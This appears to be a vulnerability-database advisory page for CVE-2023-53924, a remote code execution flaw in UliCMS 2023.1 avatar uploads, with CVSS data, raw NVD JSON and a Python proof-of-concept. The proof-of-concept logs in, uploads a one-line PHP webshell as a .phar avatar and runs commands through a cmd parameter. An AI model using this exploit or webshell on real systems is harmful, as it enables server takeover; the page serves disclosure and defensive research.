Security Vulnerability Report
中文
CVE-2023-53924 CVSS 8.8 HIGH

CVE-2023-53924

Published: 2025-12-17 23:15:52
Last Modified: 2025-12-18 19:38:40
Source: [email protected]

Description

UliCMS 2023.1-sniffing-vicuna contains a remote code execution vulnerability that allows authenticated attackers to upload PHP files with .phar extension during profile avatar upload. Attackers can trigger code execution by visiting the uploaded file's location, enabling system command execution through maliciously crafted avatar uploads.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ulicms:ulicms:2023.1:*:*:*:*:*:*:* - VULNERABLE
UliCMS 2023.1-sniffing-vicuna

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2023-53924 PoC - UliCMS Avatar Upload RCE # Target: UliCMS 2023.1 # Authentication required: Low privilege user account TARGET_URL = "http://target-website.com" USERNAME = "attacker" PASSWORD = "attacker123" def login(): """Authenticate and get session cookie""" session = requests.Session() login_url = f"{TARGET_URL}/admin/index.php" data = { "user": USERNAME, "password": PASSWORD, "action": "login" } response = session.post(login_url, data=data) return session if "success" in response.text else None def upload_malicious_avatar(session): """Upload PHP shell as avatar""" upload_url = f"{TARGET_URL}/admin/index.php?action=profile" # PHP webshell payload php_payload = "<?php system($_GET['cmd']); ?>" files = { "avatar": ("avatar.phar", php_payload, "application/octet-stream") } response = session.post(upload_url, files=files) return response def execute_command(file_url, cmd): """Execute command via uploaded webshell""" exploit_url = f"{file_url}?cmd={cmd}" response = requests.get(exploit_url) return response.text if __name__ == "__main__": print("[*] CVE-2023-53924 UliCMS RCE Exploit") session = login() if session: print("[+] Login successful") upload_malicious_avatar(session) print("[+] Malicious avatar uploaded") print("[*] Access uploaded file and use ?cmd=<command> to execute") else: print("[-] Login failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53924", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:51.580", "lastModified": "2025-12-18T19:38:40.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "UliCMS 2023.1-sniffing-vicuna contains a remote code execution vulnerability that allows authenticated attackers to upload PHP files with .phar extension during profile avatar upload. Attackers can trigger code execution by visiting the uploaded file's location, enabling system command execution through maliciously crafted avatar uploads."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ulicms:ulicms:2023.1:*:*:*:*:*:*:*", "matchCriteriaId": "CF295D7E-7EE5-4EB2-89EB-4430EDAEA71E"}]}]}], "references": [{"url": "https://web.archive.org/web/20230314183734/https://en.ulicms.de/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51434", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/ulicms-sniffing-vicuna-remote-code-execution-via-avatar-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51434", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.